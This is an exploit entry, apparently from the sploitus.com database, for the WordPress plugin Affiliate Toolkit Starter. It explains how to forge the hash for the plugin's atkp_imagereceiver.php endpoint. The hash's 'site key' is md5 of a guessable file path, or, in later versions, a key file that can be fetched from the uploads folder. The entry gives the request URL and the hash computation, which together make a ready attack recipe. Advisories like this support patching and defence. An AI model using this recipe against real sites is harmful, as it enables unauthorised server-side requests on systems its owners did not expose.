Share
## https://sploitus.com/exploit?id=WPEX-ID:39ED4934-3D91-4924-8ACC-25759FEF9E81
Send a request to http://example.com/wp-content/plugins/affiliate-toolkit-starter/tools/atkp_imagereceiver.php?image=$img&hash=$hash, where $img is base64 encoded URL, hash is computed by

$site_key = md5(__FILE__);
$hash = md5( $image_url . $site_key );
$image_url is raw URL without base64.

When for example using docker, __FILE__ could be /var/www/html/wp-content/plugins/affiliate-toolkit-starter/tools/atkp_imagereceiver.php, then the hash can be computed and the request can be successfully sent.

In versions after 3.3.6 the site key may also be present by fetching /wp-content/uploads/atkp-imagereceiver-key.php from the remote site. If it's not present, use the same site key as for earlier versions.